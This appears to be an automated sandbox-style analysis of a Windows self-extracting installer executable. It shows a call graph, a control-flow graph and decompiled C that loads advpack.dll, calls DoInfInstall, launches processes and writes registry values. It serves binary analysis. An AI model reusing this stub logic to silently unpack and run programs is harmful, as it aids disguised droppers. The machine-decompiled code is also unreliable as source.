2916->2923 2919 86658a CharPrevA 2917->2919 2918 866285 GetLastError 2920 865534 2918->2920 2921 865931 CreateFileA LocalFree 2919->2921 2920->2849 2920->2850 2922 86595b CloseHandle GetFileAttributesA 2921->2922 2921->2923 2922->2923 2923->2918 2923->2920 2925 8626e5 2924->2925 2926 8626b9 2924->2926 2928 8626ea 2925->2928 2930 86271f 2925->2930 2927 86171e _vsnprintf 2926->2927 2932 8626cc 2927->2932 2929 86171e _vsnprintf 2928->2929 2933 8626fd 2929->2933 2931 8626e3 2930->2931 2934 86171e _vsnprintf 2930->2934 2935 866ce0 4 API calls 2931->2935 2936 8644b9 20 API calls 2932->2936 2937 8644b9 20 API calls 2933->2937 2938 862735 2934->2938 2939 86276d 2935->2939 2936->2931 2937->2931 2940 8644b9 20 API calls 2938->2940 2939->2898 2940->2931 2942 86468f 7 API calls 2941->2942 2943 864ff5 FindResourceA LoadResource LockResource 2942->2943 2944 865020 2943->2944 2960 86515f 2943->2960 2945 865057 2944->2945 2946 865029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2944->2946 2963 864efd 2945->2963 2946->2945 2949 865060 2951 8644b9 20 API calls 2949->2951 2950 86507c 2952 865106 2950->2952 2953 8650e8 2950->2953 2957 865075 2951->2957 2954 865110 FreeResource 2952->2954 2955 86511d 2952->2955 2956 8644b9 20 API calls 2953->2956 2954->2955 2958 86513a 2955->2958 2959 865129 2955->2959 2956->2957 2957->2952 2958->2960 2962 86514c SendMessageA 2958->2962 2961 8644b9 20 API calls 2959->2961 2960->2743 2961->2958 2962->2960 2964 864f4a 2963->2964 2965 864fa1 2964->2965 2966 864980 25 API calls 2964->2966 2967 866ce0 4 API calls 2965->2967 2969 864f67 2966->2969 2968 864fc6 2967->2968 2968->2949 2968->2950 2969->2965 2970 864b60 FindCloseChangeNotification 2969->2970 2970->2965 2972 862510 2971->2972 2973 86255b 2971->2973 2975 86658a CharPrevA 2972->2975 2974 866ce0 4 API calls 2973->2974 2976 862569 2974->2976 2977 862522 WritePrivateProfileStringA _lopen 2975->2977 2976->2752 2977->2973 2978 862548 _llseek _lclose 2977->2978 2978->2973 2980 861b25 2979->2980 3083 861a84 2980->3083 2982 861b57 2983 86658a CharPrevA 2982->2983 2985 861b8c 2982->2985 2983->2985 2984 8666c8 2 API calls 2986 861bd1 2984->2986 2985->2984 2987 861d73 2986->2987 2988 861bd9 CompareStringA 2986->2988 2990 8666c8 2 API calls 2987->2990 2988->2987 2989 861bf7 GetFileAttributesA 2988->2989 2991 861d53 2989->2991 2992 861c0d 2989->2992 2993 861d7d 2990->2993 2996 8644b9 20 API calls 2991->2996 2992->2991 2998 861a84 2 API calls 2992->2998 2994 861d81 CompareStringA 2993->2994 2995 861df8 LocalAlloc 2993->2995 2994->2995 3004 861d9b 2994->3004 2995->2991 2997 861e0b GetFileAttributesA 2995->2997 3011 861cc2 2996->3011 2999 861e1d 2997->2999 3016 861e45 2997->3016 3000 861c31 2998->3000 2999->3016 3002 861c50 LocalAlloc 3000->3002 3007 861a84 2 API calls 3000->3007 3001 861e89 3003 866ce0 4 API calls 3001->3003 3002->2991 3005 861c67 GetPrivateProfileIntA GetPrivateProfileStringA 3002->3005 3006 861ea1 3003->3006 3004->3004 3008 861dbe LocalAlloc 3004->3008 3005->3011 3012 861cf8 3005->3012 3006->2774 3007->3002 3008->2991 3013 861de1 3008->3013 3011->3001 3014 861d09 GetShortPathNameA 3012->3014 3017 861d23 3012->3017 3015 86171e _vsnprintf 3013->3015 3014->3017 3015->3011 3089 862aac 3016->3089 3018 86171e _vsnprintf 3017->3018 3018->3011 3021 86209a 3019->3021 3028 862256 3019->3028 3020 866ce0 4 API calls 3022 862263 3020->3022 3023 86171e _vsnprintf 3021->3023 3025 8620dc 3021->3025 3022->2774 3024 8620af RegQueryValueExA 3023->3024 3024->3021 3024->3025 3026 8620e4 RegCloseKey 3025->3026 3027 8620fb GetSystemDirectoryA 3025->3027 3026->3028 3029 86658a CharPrevA 3027->3029 3028->3020 3030 86211b LoadLibraryA 3029->3030 3031 86212e GetProcAddress FreeLibrary 3030->3031 3032 862179 GetModuleFileNameA 3030->3032 3031->3032 3033 86214e GetSystemDirectoryA 3031->3033 3034 8621de RegCloseKey 3032->3034 3037 862177 3032->3037 3035 862165 3033->3035 3033->3037 3034->3028 3036 86658a CharPrevA 3035->3036 3036->3037 3037->3037 3038 8621b7 LocalAlloc 3037->3038 3039 8621ec 3038->3039 3040 8621cd 3038->3040 3042 86171e _vsnprintf 3039->3042 3041 8644b9 20 API calls 3040->3041 3041->3034 3043 862218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3028 3046 864016 CreateProcessA 3045->3046 3057 864106 3045->3057 3047 8640c4 3046->3047 3048 864041 WaitForSingleObject GetExitCodeProcess 3046->3048 3051 866285 GetLastError 3047->3051 3052 864070 3048->3052 3049 866ce0 4 API calls 3050 864117 3049->3050 3050->2774 3054 8640c9 GetLastError FormatMessageA 3051->3054 3116 86411b 3052->3116 3055 8644b9 20 API calls 3054->3055 3055->3057 3056 864096 CloseHandle CloseHandle 3056->3057 3058 8640ba 3056->3058 3057->3049 3058->3057 3060 8664c2 3059->3060 3061 86658a CharPrevA 3060->3061 3062 8664d8 GetFileAttributesA 3061->3062 3063 866501 LoadLibraryA 3062->3063 3064 8664ea 3062->3064 3066 866508 3063->3066 3064->3063 3065 8664ee LoadLibraryExA 3064->3065 3065->3066 3067 866ce0 4 API calls 3066->3067 3068 866513 3067->3068 3068->2791 3070 862381 3069->3070 3071 862289 RegOpenKeyExA 3069->3071 3072 866ce0 4 API calls 3070->3072 3071->3070 3073 8622b1 RegQueryValueExA 3071->3073 3074 86238c 3072->3074 3075 8622e6 memset GetSystemDirectoryA 3073->3075 3076 862374 RegCloseKey 3073->3076 3074->2764 3077 862321 3075->3077 3078 86230f 3075->3078 3076->3070 3079 86171e _vsnprintf 3077->3079 3080 86658a CharPrevA 3078->3080 3081 86233f RegSetValueExA 3079->3081 3080->3077 3081->3076 3084 861a9a 3083->3084 3086 861aba 3084->3086 3088 861aaf 3084->3088 3102 86667f 3084->3102 3086->2982 3087 86667f 2 API calls 3087->3088 3088->3086 3088->3087 3090 862ad4 GetModuleFileNameA 3089->3090 3091 862be6 3089->3091 3092 862b02 3090->3092 3093 866ce0 4 API calls 3091->3093 3092->3091 3094 862af1 IsDBCSLeadByte 3092->3094 3096 862b11 CharNextA CharUpperA 3092->3096 3097 862bca CharNextA 3092->3097 3098 862bd3 CharNextA 3092->3098 3101 862b43 CharPrevA 3092->3101 3107 8665e8 3092->3107 3095 862bf5 3093->3095 3094->3092 3095->3001 3096->3092 3099 862b8d CharUpperA 3096->3099 3097->3098 3098->3092 3099->3092 3101->3092 3104 866689 3102->3104 3103 8666a5 3103->3084 3104->3103 3105 866648 IsDBCSLeadByte 3104->3105 3106 866697 CharNextA 3104->3106 3105->3104 3106->3104 3108 8665f4 3107->3108 3108->3108 3109 8665fb CharPrevA 3108->3109 3110 866611 CharPrevA 3109->3110 3111 86660b 3110->3111 3112 86661e 3110->3112 3111->3110 3111->3112 3113 86663d 3112->3113 3114 866627 CharPrevA 3112->3114 3115 866634 CharNextA 3112->3115 3113->3092 3114->3113 3114->3115 3115->3113 3117 864132 3116->3117 3119 86412a 3116->3119 3120 861ea7 3117->3120 3119->3056 3121 861eba 3120->3121 3122 861ed3 3120->3122 3123 86256d 15 API calls 3121->3123 3122->3119 3123->3122 3125 862026 3124->3125 3126 861ff0 RegOpenKeyExA 3124->3126 3125->2480 3126->3125 3127 86200f RegDeleteValueA RegCloseKey 3126->3127 3127->3125 3236 8619e0 3237 861a24 GetDesktopWindow 3236->3237 3238 861a03 3236->3238 3239 8643d0 11 API calls 3237->3239 3240 861a16 EndDialog 3238->3240 3241 861a20 3238->3241 3242 861a33 LoadStringA SetDlgItemTextA MessageBeep 3239->3242 3240->3241 3243 866ce0 4 API calls 3241->3243 3242->3241 3244 861a7e 3243->3244 3245 866a20 __getmainargs 3246 866bef _XcptFilter 3247 8669b0 3248 8669b5 3247->3248 3256 866fbe GetModuleHandleW 3248->3256 3250 8669c1 __set_app_type __p__fmode __p__commode 3251 8669f9 3250->3251 3252 866a02 __setusermatherr 3251->3252 3253 866a0e 3251->3253 3252->3253 3258 8671ef _controlfp 3253->3258 3255 866a13 3257 866fcf 3256->3257 3257->3250 3258->3255 3259 8634f0 3260 863504 3259->3260 3280 8635b8 3259->3280 3261 8635be GetDesktopWindow 3260->3261 3262 86351b 3260->3262 3260->3280 3265 8643d0 11 API calls 3261->3265 3266 86354f 3262->3266 3267 86351f 3262->3267 3263 863526 3264 863671 EndDialog 3264->3263 3268 8635d6 3265->3268 3266->3263 3270 863559 ResetEvent 3266->3270 3267->3263 3269 86352d TerminateThread EndDialog 3267->3269 3271 8635e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3268->3271 3272 86361d SetWindowTextA CreateThread 3268->3272 3269->3263 3273 8644b9 20 API calls 3270->3273 3271->3272 3272->3263 3274 863646 3272->3274 3275 863581 3273->3275 3277 8644b9 20 API calls 3274->3277 3276 86359b SetEvent 3275->3276 3278 86358a SetEvent 3275->3278 3279 863680 4 API calls 3276->3279 3277->3280 3278->3263 3279->3280 3280->3263 3280->3264 3281 866ef0 3282 866f2d 3281->3282 3284 866f02 3281->3284 3283 866f27 ?terminate@ 3283->3282 3284->3282 3284->3283 3285 867270 _except_handler4_common

                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                          callgraph 0 Function_00861A84 117 Function_0086667F 0->117 1 Function_00866285 2 Function_00866380 3 Function_00863680 4 Function_00864980 34 Function_008644B9 4->34 119 Function_0086487A 4->119 5 Function_00861680 6 Function_00861781 5->6 7 Function_0086468F 8 Function_0086658A 31 Function_008616B3 8->31 9 Function_0086268B 9->34 49 Function_00866CE0 9->49 82 Function_0086171E 9->82 10 Function_00862A89 11 Function_00866495 11->6 11->8 11->49 12 Function_00866793 13 Function_00861F90 18 Function_00861EA7 13->18 13->34 13->49 14 Function_00862390 14->5 14->8 14->14 14->31 14->49 15 Function_00865C9E 15->5 15->8 15->34 40 Function_008666C8 15->40 48 Function_008631E0 15->48 15->49 77 Function_00865C17 15->77 91 Function_00866E2A 15->91 15->117 16 Function_00866298 16->49 16->82 17 Function_00864E99 17->5 111 Function_0086256D 18->111 19 Function_00866FA5 97 Function_0086724D 19->97 20 Function_00863BA2 20->1 20->6 20->7 20->11 20->34 20->49 56 Function_00863FEF 20->56 60 Function_00861AE8 20->60 90 Function_0086202A 20->90 105 Function_00862267 20->105 21 Function_008672A2 22 Function_008618A3 22->49 55 Function_008617EE 22->55 23 Function_008655A0 23->1 23->6 23->7 23->8 23->34 23->49 78 Function_00866517 23->78 93 Function_00862630 23->93 101 Function_00866952 23->101 104 Function_00865467 23->104 118 Function_0086597D 23->118 24 Function_00864CA0 25 Function_008653A1 25->5 25->8 25->49 25->82 26 Function_00866FA1 27 Function_008666AE 28 Function_00862AAC 28->5 41 Function_008617C8 28->41 28->49 62 Function_008665E8 28->62 29 Function_00862CAA 29->7 29->14 29->15 29->22 29->34 29->49 54 Function_008636EE 29->54 29->78 30 Function_008652B6 30->6 30->14 30->49 53 Function_00861FE1 30->53 30->62 31->6 32 Function_008669B0 33 Function_00866FBE 32->33 57 Function_008671EF 32->57 74 Function_00867000 32->74 116 Function_00866C70 32->116 99 Function_00866F54 33->99 34->5 42 Function_008667C9 34->42 34->49 34->82 83 Function_0086681F 34->83 35 Function_00864CC0 36 Function_00864BC0 37 Function_008630C0 38 Function_008663C0 38->6 38->8 38->49 39 Function_008658C8 39->1 39->5 39->8 39->34 98 Function_00866648 40->98 42->12 43 Function_00864CD0 43->4 43->17 43->49 51 Function_008647E0 43->51 70 Function_00864702 43->70 92 Function_00864C37 43->92 107 Function_00864B60 43->107 112 Function_0086476D 43->112 44 Function_00864AD0 44->3 45 Function_008643D0 45->49 46 Function_008651E5 46->1 46->7 46->34 47 Function_00864FE0 47->7 47->34 67 Function_00864EFD 47->67 63 Function_00866CF0 49->63 50 Function_008624E0 50->8 50->49 51->5 51->34 52 Function_008619E0 52->45 52->49 54->10 54->34 54->42 54->49 61 Function_008628E8 54->61 54->83 55->49 56->1 56->34 56->49 85 Function_0086411B 56->85 58 Function_00866BEF 59 Function_008670EB 60->0 60->5 60->6 60->8 60->28 60->31 60->34 60->40 60->49 60->82 61->10 114 Function_00862773 61->114 64 Function_008634F0 64->3 64->34 64->45 65 Function_00866EF0 66 Function_008670FE 67->4 67->49 67->107 68 Function_00862BFB 68->13 68->29 68->30 84 Function_00862F1D 68->84 69 Function_008666F9 70->5 70->31 71 Function_00866C03 71->97 72 Function_00863100 72->45 73 Function_00864200 75 Function_0086490C 76 Function_00867208 78->34 79 Function_00867010 80 Function_00863210 80->8 80->34 80->39 80->45 87 Function_00864224 80->87 80->118 81 Function_0086621E 81->1 81->34 81->49 81->118 83->49 83->69 84->1 84->8 84->20 84->23 84->34 84->46 84->49 84->81 86 Function_00863B26 84->86 94 Function_00863A3F 84->94 106 Function_00865164 84->106 84->111 113 Function_00864169 84->113 85->18 86->16 86->47 86->78 87->5 87->34 88 Function_00867120 89 Function_00866A20 90->8 90->34 90->49 90->82 91->63 93->34 93->49 94->1 94->7 94->34 94->78 95 Function_00866C3F 96 Function_00866F40 99->76 99->97 100 Function_00867155 102 Function_00864A50 103 Function_00863450 103->45 104->1 104->5 104->6 104->8 104->25 104->39 104->49 104->118 105->8 105->49 105->82 106->7 106->16 106->34 108 Function_00866A60 108->68 108->76 108->95 108->97 108->100 109 Function_00867060 108->109 109->79 109->88 110 Function_00866760 111->50 112->27 112->78 113->7 113->34 114->5 114->6 114->8 114->49 115 Function_00867270 117->98 118->1 118->9 118->34 118->49 119->75

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 36 863ba2-863bd9 37 863bfd-863bff 36->37 38 863bdb-863bee call 86468f 36->38 39 863c03-863c28 memset 37->39 44 863bf4-863bf7 38->44 45 863d13-863d30 call 8644b9 38->45 41 863d35-863d48 call 861781 39->41 42 863c2e-863c40 call 86468f 39->42 48 863d4d-863d52 41->48 42->45 53 863c46-863c49 42->53 44->37 44->45 55 863f4d 45->55 51 863d54-863d6c call 86468f 48->51 52 863d9e-863db6 call 861ae8 48->52 51->45 65 863d6e-863d75 51->65 52->55 69 863dbc-863dc2 52->69 53->45 57 863c4f-863c56 53->57 59 863f4f-863f63 call 866ce0 55->59 61 863c60-863c65 57->61 62 863c58-863c5e 57->62 67 863c67-863c6d 61->67 68 863c75-863c7c 61->68 66 863c6e-863c73 62->66 71 863fda-863fe1 65->71 72 863d7b-863d98 CompareStringA 65->72 73 863c87-863c89 66->73 67->66 68->73 76 863c7e-863c82 68->76 74 863de6-863de8 69->74 75 863dc4-863dce 69->75 79 863fe3 call 862267 71->79 80 863fe8-863fea 71->80 72->52 72->71 73->48 82 863c8f-863c98 73->82 77 863dee-863df5 74->77 78 863f0b-863f15 call 863fef 74->78 75->74 81 863dd0-863dd7 75->81 76->73 85 863fab-863fd2 call 8644b9 LocalFree 77->85 86 863dfb-863dfd 77->86 95 863f1a-863f1c 78->95 79->80 80->59 81->74 89 863dd9-863ddb 81->89 83 863cf1-863cf3 82->83 84 863c9a-863c9c 82->84 83->52 94 863cf9-863d11 call 86468f 83->94 91 863ca5-863ca7 84->91 92 863c9e-863ca3 84->92 85->55 86->78 93 863e03-863e0a 86->93 89->77 96 863ddd-863de1 call 86202a 89->96 91->55 100 863cad 91->100 99 863cb2-863cc5 call 86468f 92->99 93->78 101 863e10-863e19 call 866495 93->101 94->45 94->48 103 863f46-863f47 LocalFree 95->103 104 863f1e-863f2d LocalFree 95->104 96->74 99->45 112 863cc7-863ce8 CompareStringA 99->112 100->99 113 863f92-863fa9 call 8644b9 101->113 114 863e1f-863e36 GetProcAddress 101->114 103->55 108 863fd7-863fd9 104->108 109 863f33-863f3b 104->109 108->71 109->39 112->83 115 863cea-863ced 112->115 126 863f7c-863f90 LocalFree call 866285 113->126 116 863f64-863f76 call 8644b9 FreeLibrary 114->116 117 863e3c-863e80 114->117 115->83 116->126 120 863e82-863e87 117->120 121 863e8b-863e94 117->121 120->121 124 863e96-863e9b 121->124 125 863e9f-863ea2 121->125 124->125 128 863ea4-863ea9 125->128 129 863ead-863eb6 125->129 126->55 128->129 130 863ec1-863ec3 129->130 131 863eb8-863ebd 129->131 133 863ec5-863eca 130->133 134 863ece-863eec 130->134 131->130 133->134 137 863ef5-863efd 134->137 138 863eee-863ef3 134->138 139 863f40 FreeLibrary 137->139 140 863eff-863f09 FreeLibrary 137->140 138->137 139->103 140->104
                                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                                          			E00863BA2() {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				signed int _v12;
                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                          				char _v280;
                                                                                                                                                                                                          				short _v300;
                                                                                                                                                                                                          				intOrPtr _v304;
                                                                                                                                                                                                          				void _v348;
                                                                                                                                                                                                          				char _v352;
                                                                                                                                                                                                          				intOrPtr _v356;
                                                                                                                                                                                                          				signed int _v360;
                                                                                                                                                                                                          				short _v364;
                                                                                                                                                                                                          				char* _v368;
                                                                                                                                                                                                          				intOrPtr _v372;
                                                                                                                                                                                                          				void* _v376;
                                                                                                                                                                                                          				intOrPtr _v380;
                                                                                                                                                                                                          				char _v384;
                                                                                                                                                                                                          				signed int _v388;
                                                                                                                                                                                                          				intOrPtr _v392;
                                                                                                                                                                                                          				signed int _v396;
                                                                                                                                                                                                          				signed int _v400;
                                                                                                                                                                                                          				signed int _v404;
                                                                                                                                                                                                          				void* _v408;
                                                                                                                                                                                                          				void* _v424;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t69;
                                                                                                                                                                                                          				signed int _t76;
                                                                                                                                                                                                          				void* _t77;
                                                                                                                                                                                                          				signed int _t79;
                                                                                                                                                                                                          				short _t96;
                                                                                                                                                                                                          				signed int _t97;
                                                                                                                                                                                                          				intOrPtr _t98;
                                                                                                                                                                                                          				signed int _t101;
                                                                                                                                                                                                          				signed int _t104;
                                                                                                                                                                                                          				signed int _t108;
                                                                                                                                                                                                          				int _t112;
                                                                                                                                                                                                          				void* _t115;
                                                                                                                                                                                                          				signed char _t118;
                                                                                                                                                                                                          				void* _t125;
                                                                                                                                                                                                          				signed int _t127;
                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                          				struct HINSTANCE__* _t129;
                                                                                                                                                                                                          				void* _t130;
                                                                                                                                                                                                          				short _t137;
                                                                                                                                                                                                          				char* _t140;
                                                                                                                                                                                                          				signed char _t144;
                                                                                                                                                                                                          				signed char _t145;
                                                                                                                                                                                                          				signed int _t149;
                                                                                                                                                                                                          				void* _t150;
                                                                                                                                                                                                          				void* _t151;
                                                                                                                                                                                                          				signed int _t153;
                                                                                                                                                                                                          				void* _t155;
                                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                                          				signed int _t157;
                                                                                                                                                                                                          				signed int _t162;
                                                                                                                                                                                                          				signed int _t164;
                                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                          				_t69 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                          				_t153 = 0;
                                                                                                                                                                                                          				 *0x869124 =  *0x869124 & 0;
                                                                                                                                                                                                          				_t149 = 0;
                                                                                                                                                                                                          				_v388 = 0;
                                                                                                                                                                                                          				_v384 = 0;
                                                                                                                                                                                                          				_t165 =  *0x868a28 - _t153; // 0x0
                                                                                                                                                                                                          				if(_t165 != 0) {
                                                                                                                                                                                                          					L3:
                                                                                                                                                                                                          					_t127 = 0;
                                                                                                                                                                                                          					_v392 = 0;
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                          						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                          						_t164 = _t164 + 0xc;
                                                                                                                                                                                                          						_v348 = 0x44;
                                                                                                                                                                                                          						if( *0x868c42 != 0) {
                                                                                                                                                                                                          							goto L26;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t146 =  &_v396;
                                                                                                                                                                                                          						_t115 = E0086468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                          						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                          							L25:
                                                                                                                                                                                                          							_t146 = 0x4b1;
                                                                                                                                                                                                          							E008644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                          							 *0x869124 = 0x80070714;
                                                                                                                                                                                                          							goto L62;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							if(_v396 != 1) {
                                                                                                                                                                                                          								__eflags = _v396 - 2;
                                                                                                                                                                                                          								if(_v396 != 2) {
                                                                                                                                                                                                          									_t137 = 3;
                                                                                                                                                                                                          									__eflags = _v396 - _t137;
                                                                                                                                                                                                          									if(_v396 == _t137) {
                                                                                                                                                                                                          										_v304 = 1;
                                                                                                                                                                                                          										_v300 = _t137;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L14;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_push(6);
                                                                                                                                                                                                          								_v304 = 1;
                                                                                                                                                                                                          								_pop(0);
                                                                                                                                                                                                          								goto L11;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_v304 = 1;
                                                                                                                                                                                                          								L11:
                                                                                                                                                                                                          								_v300 = 0;
                                                                                                                                                                                                          								L14:
                                                                                                                                                                                                          								if(_t127 != 0) {
                                                                                                                                                                                                          									L27:
                                                                                                                                                                                                          									_t155 = 1;
                                                                                                                                                                                                          									__eflags = _t127 - 1;
                                                                                                                                                                                                          									if(_t127 != 1) {
                                                                                                                                                                                                          										L31:
                                                                                                                                                                                                          										_t132 =  &_v280;
                                                                                                                                                                                                          										_t76 = E00861AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                          										__eflags = _t76;
                                                                                                                                                                                                          										if(_t76 == 0) {
                                                                                                                                                                                                          											L62:
                                                                                                                                                                                                          											_t77 = 0;
                                                                                                                                                                                                          											L63:
                                                                                                                                                                                                          											_pop(_t150);
                                                                                                                                                                                                          											_pop(_t156);
                                                                                                                                                                                                          											_pop(_t128);
                                                                                                                                                                                                          											return E00866CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t157 = _v404;
                                                                                                                                                                                                          										__eflags = _t149;
                                                                                                                                                                                                          										if(_t149 != 0) {
                                                                                                                                                                                                          											L37:
                                                                                                                                                                                                          											__eflags = _t157;
                                                                                                                                                                                                          											if(_t157 == 0) {
                                                                                                                                                                                                          												L57:
                                                                                                                                                                                                          												_t151 = _v408;
                                                                                                                                                                                                          												_t146 =  &_v352;
                                                                                                                                                                                                          												_t130 = _t151; // executed
                                                                                                                                                                                                          												_t79 = E00863FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                          												__eflags = _t79;
                                                                                                                                                                                                          												if(_t79 == 0) {
                                                                                                                                                                                                          													L61:
                                                                                                                                                                                                          													LocalFree(_t151);
                                                                                                                                                                                                          													goto L62;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												L58:
                                                                                                                                                                                                          												LocalFree(_t151);
                                                                                                                                                                                                          												_t127 = _t127 + 1;
                                                                                                                                                                                                          												_v396 = _t127;
                                                                                                                                                                                                          												__eflags = _t127 - 2;
                                                                                                                                                                                                          												if(_t127 >= 2) {
                                                                                                                                                                                                          													_t155 = 1;
                                                                                                                                                                                                          													__eflags = 1;
                                                                                                                                                                                                          													L69:
                                                                                                                                                                                                          													__eflags =  *0x868580;
                                                                                                                                                                                                          													if( *0x868580 != 0) {
                                                                                                                                                                                                          														E00862267();
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													_t77 = _t155;
                                                                                                                                                                                                          													goto L63;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t153 = _v392;
                                                                                                                                                                                                          												_t149 = _v388;
                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											L38:
                                                                                                                                                                                                          											__eflags =  *0x868180;
                                                                                                                                                                                                          											if( *0x868180 == 0) {
                                                                                                                                                                                                          												_t146 = 0x4c7;
                                                                                                                                                                                                          												E008644B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                                                                                                                                                          												LocalFree(_v424);
                                                                                                                                                                                                          												 *0x869124 = 0x8007042b;
                                                                                                                                                                                                          												goto L62;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t157;
                                                                                                                                                                                                          											if(_t157 == 0) {
                                                                                                                                                                                                          												goto L57;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags =  *0x869a34 & 0x00000004;
                                                                                                                                                                                                          											if(__eflags == 0) {
                                                                                                                                                                                                          												goto L57;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t129 = E00866495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                          											__eflags = _t129;
                                                                                                                                                                                                          											if(_t129 == 0) {
                                                                                                                                                                                                          												_t146 = 0x4c8;
                                                                                                                                                                                                          												E008644B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                          												L65:
                                                                                                                                                                                                          												LocalFree(_v408);
                                                                                                                                                                                                          												 *0x869124 = E00866285();
                                                                                                                                                                                                          												goto L62;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                          											_v404 = _t146;
                                                                                                                                                                                                          											__eflags = _t146;
                                                                                                                                                                                                          											if(_t146 == 0) {
                                                                                                                                                                                                          												_t146 = 0x4c9;
                                                                                                                                                                                                          												__eflags = 0;
                                                                                                                                                                                                          												E008644B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                          												FreeLibrary(_t129);
                                                                                                                                                                                                          												goto L65;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags =  *0x868a30;
                                                                                                                                                                                                          											_t151 = _v408;
                                                                                                                                                                                                          											_v384 = 0;
                                                                                                                                                                                                          											_v368 =  &_v280;
                                                                                                                                                                                                          											_t96 =  *0x869a40; // 0x3
                                                                                                                                                                                                          											_v364 = _t96;
                                                                                                                                                                                                          											_t97 =  *0x868a38 & 0x0000ffff;
                                                                                                                                                                                                          											_v380 = 0x869154;
                                                                                                                                                                                                          											_v376 = _t151;
                                                                                                                                                                                                          											_v372 = 0x8691e4;
                                                                                                                                                                                                          											_v360 = _t97;
                                                                                                                                                                                                          											if( *0x868a30 != 0) {
                                                                                                                                                                                                          												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                          												__eflags = _t97;
                                                                                                                                                                                                          												_v360 = _t97;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t144 =  *0x869a34; // 0x1
                                                                                                                                                                                                          											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                          											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                          												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                          												__eflags = _t97;
                                                                                                                                                                                                          												_v360 = _t97;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                          											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                          												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                          												__eflags = _t97;
                                                                                                                                                                                                          												_v360 = _t97;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t145 =  *0x868d48; // 0x0
                                                                                                                                                                                                          											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                          											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                          												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                          												__eflags = _t97;
                                                                                                                                                                                                          												_v360 = _t97;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t145;
                                                                                                                                                                                                          											if(_t145 < 0) {
                                                                                                                                                                                                          												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                          												__eflags = _t104;
                                                                                                                                                                                                          												_v360 = _t104;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t98 =  *0x869a38; // 0x0
                                                                                                                                                                                                          											_v356 = _t98;
                                                                                                                                                                                                          											_t130 = _t146;
                                                                                                                                                                                                          											 *0x86a288( &_v384);
                                                                                                                                                                                                          											_t101 = _v404();
                                                                                                                                                                                                          											__eflags = _t164 - _t164;
                                                                                                                                                                                                          											if(_t164 != _t164) {
                                                                                                                                                                                                          												_t130 = 4;
                                                                                                                                                                                                          												asm("int 0x29");
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											 *0x869124 = _t101;
                                                                                                                                                                                                          											_push(_t129);
                                                                                                                                                                                                          											__eflags = _t101;
                                                                                                                                                                                                          											if(_t101 < 0) {
                                                                                                                                                                                                          												FreeLibrary();
                                                                                                                                                                                                          												goto L61;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												FreeLibrary();
                                                                                                                                                                                                          												_t127 = _v400;
